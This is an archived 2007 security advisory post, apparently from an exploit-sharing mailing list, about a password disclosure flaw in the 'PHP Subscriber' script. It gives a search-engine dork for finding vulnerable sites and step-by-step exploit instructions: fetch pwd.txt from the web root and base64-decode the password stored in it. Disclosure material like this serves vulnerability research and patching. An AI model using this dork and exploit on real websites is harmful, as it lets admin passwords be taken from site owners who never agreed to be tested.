Security Advisory: subscribe (pwd.txt) Remote Password Disclosur

[EN] securityvulns.ru
no-pyccku

Related information
  Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)
  Maxtricity Tagger Password Disclosure Vulnerability
  ZixForum <= 1.14 (Zixforum.
mdb) Remote Password Disclosure Vulnerability
  [Full-disclosure] [OPENADS-SA-2007-
001] phpAdsNew and phpPgAds 2.0.9-pr1 vulnerability fixed
  Toxiclab Shoutbox Password Disclosure Vulnerability

From: the.tiger100_(at)_gmail.com <the.tiger100_(at)_gmail.com>
Date: 24.01.2007
Subject: subscribe (pwd.txt) Remote Password Disclosur

#################################################################################
####
#subscribe (pwd.txt) Remote Password Disclosur
#################################################################################
####
#
#D0rk = "Powered By PHP Subscriber"
#
#
#discovered by : ThE TiGeR 100
#
#################################################################################
####
#Exploit :
#
#http://www.site.com/[path]/pwd.txt
#
#or
#
#http://www.site.com/pwd.txt
#
#then crack the password with bass64 decode ,,the password is coded by base64 not hash
#
#################################################################################
####
#
#Contact:the.tiger100@gmail.com
#
#
#GreetZ to str0k ;)
#
#                 Your Time is UpMy Time Is Now,
#                 You Can't See Me My Time Is Now
#################################################################################
####

test server